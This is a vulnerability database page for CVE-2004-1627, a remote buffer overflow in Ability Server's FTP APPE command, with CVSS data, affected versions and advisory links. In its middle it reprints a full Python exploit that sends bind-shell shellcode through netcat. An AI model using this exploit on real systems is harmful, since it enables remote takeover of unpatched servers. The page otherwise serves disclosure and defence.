CVE-2004-1627
CVSS7.5
发布时间 :2004-10-22 00:00:00
修订时间 :2008-09-05 16:41:55
NMCOES    

[原文]Buffer overflow in Ability Server 2.25, 2.32, 2.34, and possibly other versions, allows remote attackers to execute arbitrary code via a long APPE command.


[CNNVD]Code-Crafters Ability Server FTP STOR和APPE参数远程缓冲区溢出漏洞(CNNVD-200410-088)

        Ability Server 2.25版本、2.32版本、2.34版本和其他可能的版本存在漏洞。远程攻击者借助超长APPE命令执行任意代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:code-crafters:ability_server:2.3.4
cpe:/a:code-crafters:ability_server:2.2.5
cpe:/a:code-crafters:ability_server:2.3.2

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1627
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1627
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200410-088
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/11508
(VENDOR_ADVISORY)  BID  11508
http://securitytracker.com/id?1012464
(VENDOR_ADVISORY)  SECTRACK  1012464
http://secunia.com/advisories/12941
(VENDOR_ADVISORY)  SECUNIA  12941
http://lists.virus.org/dw-0day-0412/msg00004.html
(VENDOR_ADVISORY)  MLIST  [0day] 20041208 Ability Server 2.25 - 2.34 FTP => 'APPE' Buffer Overflow - PnK:: DCN3T
http://xforce.iss.net/xforce/xfdb/18405
(UNKNOWN)  XF  ability-appe-bo(18405)
http://www.osvdb.org/12347
(UNKNOWN)  OSVDB  12347

- 漏洞信息

Code-Crafters Ability Server FTP STOR和APPE参数远程缓冲区溢出漏洞
高危 缓冲区溢出
2004-10-22 00:00:00 2005-10-20 00:00:00
远程  
        Ability Server 2.25版本、2.32版本、2.34版本和其他可能的版本存在漏洞。远程攻击者借助超长APPE命令执行任意代码。

- 公告与补丁

        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- 漏洞信息 (592)

Ability Server <= 2.34 (APPE) Remote Buffer Overflow Exploit (EDBID:592)
windows remote
2004-10-23 Verified
21 KaGra
N/A [点击下载]
##################################################
##                                              ##
##              Ability Ftp Server 2.34         ##
##        Remote exploit in APPE command        ##
##        discovered,exploited by KaGra         ##
## Use it with netcat: exploit.py|nc (host) 21  ##
##     BindShell at port 4444,one shot OnLy!    ##
##################################################


import struct
shell = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xe0\x66"
shell += "\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x66\x4f\x97\xb6"
shell += "\x31\x97\xae\xc4\x7e\x97\x87\xdc\xed\x48\xc7\x98\x67\xf6\x49\xaa"
shell += "\x7e\x97\x98\xc0\x67\xf7\x21\xd2\x2f\x97\xf6\x6b\x67\xf2\xf3\x1f"
shell += "\x9a\x2d\x02\x4c\x5e\xfc\xb6\xe7\xa7\xd3\xcf\xe1\xa1\xf7\x30\xdb"
shell += "\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\xf7\xa4\x6b\x6a\x57\x49\xba"
shell += "\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x39\x42\x9f\xbb"
shell += "\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x6a\x97\x99\xfc"
shell += "\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\xb0\x95\x05\x61"
shell += "\x8a\x1c\xc3\xe0\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x66\x1c\xc2\x70"
shell += "\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x2f\x9a\x8b\x44"
shell += "\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x8b\xe0\xf9\xb7"
shell += "\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\xb1\x95\x1d\x69"
shell += "\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x99\x49\xc6\xb9"
shell += "\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x56\x2d\x02\xb0"
shell += "\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x57\xc7\x91\xb3"
shell += "\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x33\x38\x91\xb7"
shell += "\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x46\x95\x05\x88\x25\x51\x86\xe0"
shell += "\xef\xff\x45\x1a\x57\xdc\x4f\x9c\x42\xb0\xa8\xf5\x3f\xef\x69\x67"
shell += "\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x42\x20\xc3\xe1"
shell += "\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\xeb\x58\xe6\xf0"
shell += "\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x99\x69\xc2\x88"
shell += "\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x13\x1c\xaa\x4d"
shell += "\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x99\xcf\x3d\x95"
shell += "\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x99\xcc\xc2"

 

buffer = '\x41'*968+struct.pack('<L', 0x77da76af)+'\x42'*32+shell # JMP ESP=>0x77da76af Windows XP SP1 EngLisH 


print "USER kagra"#      Enter a valid username HeRe!
print "PASS kagra"#  Enter a valid password HeRe!
print "APPE " + buffer

# milw0rm.com [2004-10-23]
		

- 漏洞信息

12347
Ability Server APPE Command Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

A remote overflow exists in Ability Server. The application fails to perform proper bounds checking resulting in a buffer overflow. By issuing an overly long string to the 'APPE' command, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2004-12-08 Unknow
Unknow Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

- 漏洞信息

Code-Crafters Ability Server FTP STOR And APPE Arguments Remote Buffer Overflow Vulnerability
Boundary Condition Error 11508
Yes No
2004-10-22 12:00:00 2009-07-12 08:06:00
Exploit code was provided by muts@whitehat.co.il and Dark Eagle. The discoverer of this issue is currently unknown. Further information about the APPE command was provided by Justin Walpole.

- 受影响的程序版本

Code-Crafters Ability Server 2.3.4
Code-Crafters Ability Server 2.3.2
Code-Crafters Ability Server 2.2.5

- 漏洞讨论

Ability Server is reported prone to a remote buffer overflow vulnerability. This issue affects the FTP component of the application and arises due to insufficient boundary checks performed by the FTP server.

A successful attack can result in memory corruption leading to a crash, however, if an attacker is able to overwrite sensitive memory addresses, they could execute code on a computer. Arbitrary code execution occurs in the context of the FTP process and may result in unauthorized access to the vulnerable computer.

Ability Server versions 2.34 and prior were identified to be vulnerable to this issue.

- 漏洞利用

The following exploits are available:

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站